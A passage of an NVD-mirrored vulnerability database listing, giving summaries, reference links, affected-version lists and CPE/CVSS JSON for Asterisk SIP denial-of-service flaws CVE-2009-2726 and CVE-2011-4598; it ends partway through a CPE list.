    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/436127/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/436671/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/18295"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2006/2181"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27045"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2009-08-12 10:30

Modified

2024-11-21 01:05

Severity ?

Summary

The SIP channel driver in Asterisk Open Source 1.2.x before 1.2.34, 1.4.x before 1.4.26.1, 1.6.0.x before 1.6.0.12, and 1.6.1.x before 1.6.1.4; Asterisk Business Edition A.x.x, B.x.x before B.2.5.9, C.2.x before C.2.4.1, and C.3.x before C.3.1; and Asterisk Appliance s800i 1.2.x before 1.3.0.3 does not use a maximum width when invoking sscanf style functions, which allows remote attackers to cause a denial of service (stack memory consumption) via SIP packets containing large sequences of ASCII decimal characters, as demonstrated via vectors related to (1) the CSeq value in a SIP header, (2) large Content-Length value, and (3) SDP.

References

URL	Tags
cve@mitre.org	http://downloads.digium.com/pub/security/AST-2009-005.html	Product
cve@mitre.org	http://labs.mudynamics.com/advisories/MU-200908-01.txt	Broken Link
cve@mitre.org	http://secunia.com/advisories/36227	Broken Link, Vendor Advisory
cve@mitre.org	http://www.securityfocus.com/archive/1/505669/100/0/threaded	Broken Link, Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securityfocus.com/bid/36015	Broken Link, Exploit, Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securitytracker.com/id?1022705	Broken Link, Third Party Advisory, VDB Entry
cve@mitre.org	http://www.vupen.com/english/advisories/2009/2229	Broken Link, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2009-005.html	Product
af854a3a-2127-422b-91ae-364da2661108	http://labs.mudynamics.com/advisories/MU-200908-01.txt	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/36227	Broken Link, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/505669/100/0/threaded	Broken Link, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/36015	Broken Link, Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id?1022705	Broken Link, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2009/2229	Broken Link, Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	s800i_firmware	*
digium	s800i	-
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:business:*:*:*:*:*",
              "matchCriteriaId": "C7DBF0A2-9606-43EF-88E6-905B4864D377",
              "versionEndExcluding": "b.2.5.9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:business:*:*:*:*:*",
              "matchCriteriaId": "945FA0F6-42A8-4AF4-9EF6-4B16D08B2724",
              "versionEndIncluding": "c.2.4.1",
              "versionStartIncluding": "c.2.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:business:*:*:*:*:*",
              "matchCriteriaId": "7375080A-38B8-4230-875B-FC6184F23792",
              "versionEndExcluding": "c.3.1",
              "versionStartIncluding": "c.3.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:digium:s800i_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "3E7FEE3E-B19C-4E7E-92D6-D0032A5DAA59",
              "versionEndExcluding": "1.3.0.3",
              "versionStartIncluding": "1.2.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:digium:s800i:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "15C35F93-0E57-4AEB-AA5F-4EDFAE753451",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "86564062-C367-4652-820A-7B4700011463",
              "versionEndExcluding": "1.2.34",
              "versionStartIncluding": "1.2.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "2CD3CE8A-7145-4501-A61A-D29F575E8795",
              "versionEndExcluding": "1.4.26.1",
              "versionStartIncluding": "1.4.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E6BB86F-2FC7-4830-AC2E-4F114D87FE4C",
              "versionEndExcluding": "1.6.0.12",
              "versionStartIncluding": "1.6.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A4DBF98F-EF1D-4DC0-93FE-2EC280AAA5EF",
              "versionEndExcluding": "1.6.1.4",
              "versionStartIncluding": "1.6.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The SIP channel driver in Asterisk Open Source 1.2.x before 1.2.34, 1.4.x before 1.4.26.1, 1.6.0.x before 1.6.0.12, and 1.6.1.x before 1.6.1.4; Asterisk Business Edition A.x.x, B.x.x before B.2.5.9, C.2.x before C.2.4.1, and C.3.x before C.3.1; and Asterisk Appliance s800i 1.2.x before 1.3.0.3 does not use a maximum width when invoking sscanf style functions, which allows remote attackers to cause a denial of service (stack memory consumption) via SIP packets containing large sequences of ASCII decimal characters, as demonstrated via vectors related to (1) the CSeq value in a SIP header, (2) large Content-Length value, and (3) SDP."
    },
    {
      "lang": "es",
      "value": "El driver SIP channel en Asterisk Open Source v1.2.x anterior a v1.2.34, v1.4.x anterior a v1.4.26.1, v1.6.0.x anterior a v1.6.0.12, y v1.6.1.x anterior a v1.6.1.4; Asterisk Business Edition vA.x.x, vB.x.x anterior a vB.2.5.9, vC.2.x anterior a vC.2.4.1, y vC.3.x anterior a vC.3.1; y Asterisk Appliance s800i v1.2.x anterior a v1.3.0.3, no utiliza el ancho m\u00e1ximo cuando se invocan las funciones de estilo sscanf, lo que permite a atacantes remotos producir una denegaci\u00f3n de servicio (agotamiento de la pila de memoria) a trav\u00e9s de paquetes SIP que contienen secuencias largas de caracteres ASCII decimales, como se demostr\u00f3 a trav\u00e9s de vectores relacionados con (1) el valor CSeq en una cabecera SIP, (2) valores  Content-Length, y (3) SDP."
    }
  ],
  "id": "CVE-2009-2726",
  "lastModified": "2024-11-21T01:05:36.590",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 7.8,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2009-08-12T10:30:01.110",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Product"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2009-005.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link"
      ],
      "url": "http://labs.mudynamics.com/advisories/MU-200908-01.txt"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/36227"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/archive/1/505669/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link",
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/36015"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id?1022705"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link",
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2009/2229"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2009-005.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://labs.mudynamics.com/advisories/MU-200908-01.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/36227"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/archive/1/505669/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link",
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/36015"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id?1022705"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link",
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2009/2229"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-770"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2011-12-15 03:57

Modified

2024-11-21 01:32

Severity ?

Summary

The handle_request_info function in channels/chan_sip.c in Asterisk Open Source 1.6.2.x before 1.6.2.21 and 1.8.x before 1.8.7.2, when automon is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted sequence of SIP requests.

References

▼	URL	Tags
	secalert@redhat.com	http://downloads.asterisk.org/pub/security/AST-2011-014.html
	secalert@redhat.com	http://openwall.com/lists/oss-security/2011/12/09/3
	secalert@redhat.com	http://openwall.com/lists/oss-security/2011/12/09/4
	secalert@redhat.com	http://osvdb.org/77598
	secalert@redhat.com	http://secunia.com/advisories/47273
	secalert@redhat.com	http://www.debian.org/security/2011/dsa-2367
	af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2011-014.html
	af854a3a-2127-422b-91ae-364da2661108	http://openwall.com/lists/oss-security/2011/12/09/3
	af854a3a-2127-422b-91ae-364da2661108	http://openwall.com/lists/oss-security/2011/12/09/4
	af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/77598
	af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/47273
	af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2011/dsa-2367

Impacted products

Vendor	Product	Version
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2
digium	asterisk	1.8.4.3
digium	asterisk	1.8.4.4
digium	asterisk	1.8.5
digium	asterisk	1.8.5
digium	asterisk	1.8.5.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.1
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.2
digium	asterisk	1.6.2.3
digium	asterisk	1.6.2.4
digium	asterisk	1.6.2.5
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.15
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16.1
digium	asterisk	1.6.2.16.2
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17.1
digium	asterisk	1.6.2.17.2
digium	asterisk	1.6.2.17.3
digium	asterisk	1.6.2.18
digium	asterisk	1.6.2.18
digium	asterisk	1.6.2.19
digium	asterisk	1.6.2.19
digium	asterisk	1.6.2.20
digium	asterisk	1.6.2.21

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C00A6EFB-A848-46D3-AAD7-FD8140007E42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB6E3972-5C53-4B6D-BFE1-67E1122EA013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "048617A0-A783-4519-A947-35220D4CD786",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "DD493A41-E686-444C-A34E-412804510F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D25FD6-CC3A-4AB0-B7B1-67D07386F99D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C402E9E-09CC-4EFA-AC27-156437B05B22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C8A41F9C-D2F4-47A9-80CD-2B1BF6B0CB63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "627FF5B9-E5A8-4DBC-A891-B175011E72A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6146EB2E-BA32-4408-B10B-A711EC39C580",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1C863324-05AE-4FCA-BD2E-39040A468DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A85F51E7-0AAE-4F3B-9F90-BD2E31255822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "315FB0D4-D4A4-4369-BFB8-F2CAEB429015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "DC74D6C5-F410-4B68-AF92-056B727193A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B70911F8-A526-4600-8198-03FF4CCB28DE",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F8B700A-FACB-4BC8-9DF2-972DC63D852B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FFD31B9B-2F43-4637-BE56-47A807384BF3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E6450D6B-C907-49E6-9788-E4029C09285F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "DDB0432E-024A-4C0C-87FF-448E513D2834",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "D6A6A343-FEA2-49E5-9858-455AE3B29470",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "D57B94E3-EA37-466C-ADC4-5180D4502FDD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc7:*:*:*:*:*:*",
              "matchCriteriaId": "64D35A89-6B21-4770-AA0F-424C5C91A254",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc8:*:*:*:*:*:*",
              "matchCriteriaId": "14817302-A34A-4980-B148-AEB4B3B49BE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61FDFA96-E62A-413B-9846-F51F1F7349EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DA924386-49F6-4371-B975-B1473EEA12F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B74A1B99-8901-4690-B994-1DAD3EFA5ABB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4253C7DD-3588-4B35-B96D-C027133BE93F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "24AE11DB-16D3-42BF-BC64-E8982107D35B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "53841D77-926C-4362-BC85-BD8B6AC4391D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "F98FD6E6-EDE9-437D-B7C2-2DB65B73D230",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "4BA6CA77-D358-4623-8400-78EFC47ADB7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B4E62DAB-45E0-4EAA-8E45-6D3757A679D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.15:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1355578C-B384-401A-9123-2789CBECAD0B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "3491F8DB-A162-4608-B5F9-5401FE058CEB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C52730A8-D96E-46C1-8905-1D78A93E9C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6E5CD17-B14A-4BDB-BA75-261344FF6F25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "63C8DBF5-6992-4618-BD2D-56F1F98EAE3C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEED6C07-CFB7-44DC-9A41-9B6271942123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0864DAF9-B7FA-4018-99F4-F2A7AA6FBBB0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "694B257B-E73B-4534-B316-87284FA45534",
